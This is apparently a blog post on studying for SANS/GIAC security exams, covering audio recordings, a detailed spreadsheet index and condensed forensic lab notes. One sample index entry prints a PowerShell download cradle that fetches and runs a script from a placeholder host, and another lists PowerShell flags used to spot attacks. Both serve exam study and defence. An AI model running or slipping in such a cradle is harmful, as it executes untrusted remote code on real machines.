How I Prepare for SANS/GIAC Exams (After Taking 9 of Them)

Let's Get Real About SANS Exams

After nine SANS certifications, I've figured out what works (and what doesn't) for actually passing these things. Everyone's got their own method, but here's mine - the one that's consistently gotten me through exams without losing my sanity.

Fair warning: this isn't the "official" way to do it. It's just what works for me, and maybe it'll work for you too.

The Audio Method: Live Class Recordings Hit Different

Here's something most people don't realize: SANS provides MP3 recordings from actual live classes - not just the OnDemand videos. These are recordings from the 5-day live courses, one for each book.

I download all the MP3s and listen to them like podcasts during my commute, while walking the dog, or when I'm doing mindless tasks around the house.

Why live recordings are better than videos:

You get real student questions - "Wait, can you explain that again?" moments that mirror your own confusion
Instructors go off-script with war stories and tips they don't include in the polished videos
The natural flow of conversation is easier to follow than scripted content
When an instructor says "this WILL be on the exam" in response to a question, you know they mean it

The reality check on audio-only learning: Some concepts just don't translate well without visuals:

GPYC (Python): Trying to understand code indentation and syntax through audio alone? Not ideal.
GCFE (Forensics): Those long registry keys like "HKLM\SYSTEM\CurrentControlSet\Services\bam\State\UserSettings{SID}" just become word soup
GCIA (Packet Analysis): Hard to visualize packet structure without seeing the hex dumps

But here's the thing - I'm not trying to learn everything through audio. I'm:

Reinforcing concepts I'll read later
Catching explanations that might click better when heard vs read
Getting familiar with the instructor's emphasis on what's important
Absorbing the material during time that would otherwise be wasted

The key is treating it like a podcast that's priming your brain for the real studying, not as your primary learning method. Sometimes I'll hear an instructor explain something and think "oh, THAT'S what that means" - even if I need to see it visually later to fully understand.

The Index: Where 90% of My Learning Actually Happens

Here's the thing about my index that I didn't fully explain before - creating the index IS my studying. I'm not just building a reference tool; I'm actively learning and processing the material as I index it.

When I say I spend 60% of my prep time on the index, what I really mean is that building the index is how I study. It forces me to:

Actually read every page (not skim)
Decide what's important enough to index
Understand concepts well enough to write them in my own words
Think about how I'll search for this information under pressure
Organize everything alphabetically for rapid lookup with tabs

My Actual Indexing Process (With Real Examples)

Let me show you what my index entries actually look like in Google Sheets. I use a four-column format that turns my index into a searchable knowledge base:

My Google Sheets Setup:

Column A: Topic/Category
Column B: Detailed Description/Answer
Column C: Page Reference
Column D: Book Number (when multiple books)

Instead of just: "TCP Flags - p.89"

What my spreadsheet actually contains:

Title: TCP Flags > SYN+ACK > Server Response
Description: Indicates open port - If SYN sent first, SYN+ACK means port is open and listening
Page: 89-91
Book: 1

Title: TCP Flags > RST > Connection Refused  
Description: Port closed or filtered - Immediate termination of connection attempt
Page: 92
Book: 1

Title: TCP Flags > Combinations > Xmas Tree Scan
Description: FIN+PSH+URG flags all set - All lit up like Christmas - Used for OS fingerprinting
Page: 93
Book: 1

See the difference? The description column contains the actual answer, not just a topic reference. During the exam, I can search for any keyword and the answer is right there - no page flipping required.

The "Answer in the Index" Approach

Here's my secret - I put the actual answer in my Description column. Look at this example from my GCFE index:

What most people index: "Registry Analysis - p.234"

What my Google Sheets index contains:

Title: Registry > UserAssist > ROT13 Encoded
Description: Shows GUI program execution with run count and last run time. 
             Decode with CyberChef or tr 'A-Za-z' 'N-ZA-Mn-za-m'. 
             Location: NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist. 
             Contains: Execution count (runs) + Focus time + Last execution timestamp
Page: 234-237
Book: 2

During the exam, I don't have to flip to page 234 in the course book - the complete answer is right there in my printed index. This is huge when you're working with physical materials. Instead of:

Find topic in index
Note page number
Find course book
Flip to page 234
Read and understand
Answer question

I just:

Find topic in index
Read answer
Move on

That's the difference between 3 minutes and 30 seconds per question.

Building Mental Models Through Indexing

The real magic happens when you create entries that show relationships. Here's how I indexed incident response phases in my spreadsheet:

Title: IR Process > Preparation
Description: "Do we have a plan?" - If no, you're already behind. 
             Includes: Team roles, contact lists, tools, practice scenarios
Page: 45-48
Book: 1

Title: IR Process > Identification  
Description: "Is this actually bad?" - Don't cry wolf. 
             Triage process, initial indicators, escalation criteria
Page: 49-50
Book: 1

Title: IR Process > Containment
Description: "Stop the bleeding" - Short-term: Pull cable, isolate system. 
             Long-term: Monitor, allow continued access for intelligence  
Page: 50-51
Book: 1

Title: IR Process > Eradication
Description: "Kill it with fire" - But find root cause first. 
             Remove malware, close vulnerabilities, eliminate backdoors
Page: 51
Book: 1

Title: IR Process > Recovery
Description: "Prove it's really dead" - Validate before declaring victory. 
             Restoration procedures, monitoring for reinfection
Page: 52
Book: 1

Title: IR Process > Lessons Learned
Description: "Don't let this happen again" - Document everything. 
             What worked, what didn't, timeline, improvements needed
Page: 52
Book: 1

This isn't just an index - it's a mental model that sticks in my brain. The Description column contains both the concept and the practical application.

Why This Level of Detail Works

The Google Sheets Build → Print Reality

Let me be clear about something crucial: I build my index in Google Sheets, but I can only bring printed materials to the exam. No laptops, no Ctrl+F, just good old paper.

Using Google Sheets for building gives me:

Easy editing and reorganization while studying
Ability to add rows and fix mistakes
Sort by different columns during creation
Clean formatting that prints nicely

But on exam day, I'm working with 40-50 pages of printed spreadsheet organized alphabetically. That's why the multiple keywords are absolutely critical - I can't search digitally, so I need multiple mental pathways to the same information.

Why Multiple Keywords Matter Even More on Paper: When I'm staring at an exam question about "lateral movement," I need to be able to flip to the right letter section using the sticky ABC tabs and find it whether my brain thinks:

"Lateral movement" (flip to L)
"RDP" (flip to R if the question mentions port 3389)
"Event logs" (flip to E if it's about 4624)
"Network" (flip to N if it's about traffic)
"Workstation" (flip to W if that's how the question phrases it)

Each of these keywords appears in my Title column for the same concept, giving me multiple chances to find it. With alphabetical tabs, I can get to any letter section in seconds, then scan for the specific entry.

Cross-Referencing Everything

Take "PowerShell" as an example. In my spreadsheet, I have multiple rows for the same concept approached from different angles:

Title: PowerShell > Malicious Use > Download Cradles
Description: IEX (New-Object Net.WebClient).DownloadString('http://bad.com/evil.ps1') 
             Common technique for fileless malware
Page: 234
Book: 2

Title: Windows > Living Off the Land > PowerShell.exe
Description: Built-in Windows tool abused by attackers 
             Check for encoded commands, unusual execution policies, web requests
Page: 156
Book: 1

Title: Event Logs > 4104 > PowerShell Script Block
Description: Logs actual PowerShell commands executed - Even if obfuscated. 
             Enable in Group Policy for detection
Page: 278
Book: 3

Title: Incident Response > Collection > PowerShell
Description: Get-WinEvent, Get-Process, Get-NetTCPConnection 
             Built-in cmdlets for live response
Page: 389
Book: 2

Title: Blue Team > Detection > PowerShell
Description: Suspicious indicators: -enc, -nop, -w hidden, downloads, 
             base64 strings, bypass execution policy
Page: 445
Book: 3

Why this redundancy is critical when you can't Ctrl+F: In the exam, I don't know if the question will approach PowerShell from a forensics angle, an incident response angle, or a detection angle. When I'm flipping through printed pages, I need multiple entry points.

If the question mentions "event ID 4104," I'll find it under Event Logs. If it asks about "living off the land," I'll find it under Windows. If it's about "incident response commands," I'll find it there. Same information, multiple paths to get there - because I only get one shot at finding it quickly on paper.

The Lab Reality Check

Let me be honest about labs - they're valuable, but I approach them strategically based on the course content.

How I Actually Handle Labs:

For courses with heavy hands-on components (GCFE, GCFA, GPYC, GCIA), I do most of the labs because you need that muscle memory. For more conceptual courses without CyberLive, I might do fewer labs, but I always at least read through them to understand the process.

When I do labs, I create ultra-condensed notes that capture just the essential steps. These go in a separate Word document - not in my main index. Here's an example from GCFE:

Original Lab Instructions: "In this lab, you will learn to use Arsenal Image Mounter to mount forensic images, understand the various mounting options, configure the tool for forensic analysis..." (goes on for 3 pages outlines each step)

What I Write in My Lab Notes:

Lab 1.1 - Mount Image with AIM
1. Open Arsenal Image Mounter → "Mount Image"
2. Select .E01 file
3. Choose "disk device, write temp" → OK
4. Note mount point (usually E:\)
5. May need to show hidden files in options

That's it. Five lines instead of three pages. During the exam, I don't need the theory - I need the steps.

Another Example - Registry Analysis:

Lab 2.1 - SAM User Profiling
1. Mount VHDX via KAPE
2. Registry Explorer → Load Hive → E:\C\Windows\System32\config\SAM
3. Navigate: SAM\Domains\Accounts\Users → View "Users" tab
4. Check RID >1000 = user created (not default)
5. Cloud accounts show 0 login count
6. Convert RID to hex (1002 = 3EA) → find matching Users subkey

The magic is in distilling complex procedures down to the bare essentials. I'm not learning the tool during the exam - I just need to remember the workflow.

My Lab Note Process:

First Pass: Do the lab while writing down every single click/command
Second Pass: Remove all explanation, theory, and "why" content
Final Version: Just the commands and critical decision points
Print Separately: These become their own reference document

Why I Keep Lab Notes Separate:

Lab procedures are sequential - different from the alphabetical index
I might need to follow a specific workflow step-by-step
Keeps my main index focused on concepts and facts
Lab notes are usually only 5-10 pages vs 40-50 for the index

The Truth About "Skipping" Labs: Even when I think I might skip labs in certain courses, I usually end up doing at least some because:

Sometimes the lab reveals a tool feature not mentioned in the lecture
Instructors often drop exam hints during lab walkthroughs
The hands-on experience sticks differently than reading about it
Lab-based questions on the exam are easier when you've actually done it
That "aha!" moment when something clicks during a lab is invaluable
The labs can still be on the test, they just aren't "hands on" like CyberLive

The key is being strategic - do the labs that will help you understand core concepts, and always create those condensed notes for the ones you do.

Variables change (different usernames, paths, etc.) but the process stays the same
I'm not memorizing - I'm creating a personal runbook
The act of condensing forces me to understand what's actually important
During the exam, I can execute the process without thinking

The Bottom Line

My method works because I'm not forcing myself to memorize anything. I'm building a personalized reference system that mirrors how my brain actually works. The heavy lifting happens during index creation - by exam time, I've already processed the information multiple times:

First pass: Listening to audio (passive absorption)
Second pass: Reading the book while indexing (active processing)
Third pass: Condensing lab procedures to essential steps (practical application)
Fourth pass: Organizing and cross-referencing everything (deep understanding)
Fifth pass: Practice tests to refine the index (exam preparation)

By exam day, finding answers is just muscle memory, and with all of this workup you probably wont need 90% of the work you did, you'll just know it.

The index isn't just a tool - it's the entire studying process condensed into a searchable format. When you put the answers directly in your index entries, condensed lab commands, organize them in multiple ways, and create mental models instead of just page references, you're not just preparing for the exam - you're actually learning the material.